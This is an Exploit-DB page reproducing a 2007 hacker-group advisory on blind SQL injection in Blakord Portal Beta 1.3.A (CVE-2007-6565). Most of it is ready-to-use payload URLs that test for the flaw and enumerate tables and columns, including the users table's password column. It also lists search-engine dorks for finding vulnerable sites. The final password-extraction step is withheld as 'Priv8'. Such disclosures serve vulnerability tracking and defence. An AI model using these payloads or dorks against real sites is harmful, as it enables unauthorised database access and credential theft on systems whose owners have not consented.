Blakord Portal Beta 1.3.A (All Modules) - SQL Injection

EDB-ID:

4793

CVE:

2007-6565

EDB Verified:

Author:

JosS

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2007-12-26

Vulnerable App: 
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+            Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection          +==--
--==+====================================================================================+==--
                     [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: Blakord Portal
[~] HomePage: http://www.cdv3k.com
[~] Exploit: Blind Sql Injection [High]
[~] Where: All Modules
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Dork: "Power by Blakord Portal"
[~] Dork2: "Powered by Blakord Portal"
[~] Dork3: "Blakord Portal"

[+] Compression:

[~] True: http://localhost/[path]/[any module]?id=1 and 1=1
[~] False: http://localhost/[path]/[any module]?id=1 and 1=2

[+] Exploding:

[*] Checking table: 

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) >= 0
[~] Exploit2: http://localhost/[path]/[any module]?id=1 and exists (select * from [TABLE])
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) >= 0
[~] Example2: http://localhost/[path]/[any module]?id=1 and exists (select * from users)
[~] If you don't see any error, it is tha table exist.

[*] Checking columns number of table:

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) = [NUMBER]
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) = 6
[~] If you don't see any error, the table has 6 columns.

[*] Checking columns of table:

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(U_PASSWORD) FROM users) >= 0
[~] If you don't see any error, the column exists.

[*] Admin Password; Noob or Lammer?:

[~] Exploit: Priv8
[~] Example: Priv8
[~] Priv8 , xD.

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--==+====================================================================================+==--
                                       [+] [The End]

# milw0rm.com [2007-12-26]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services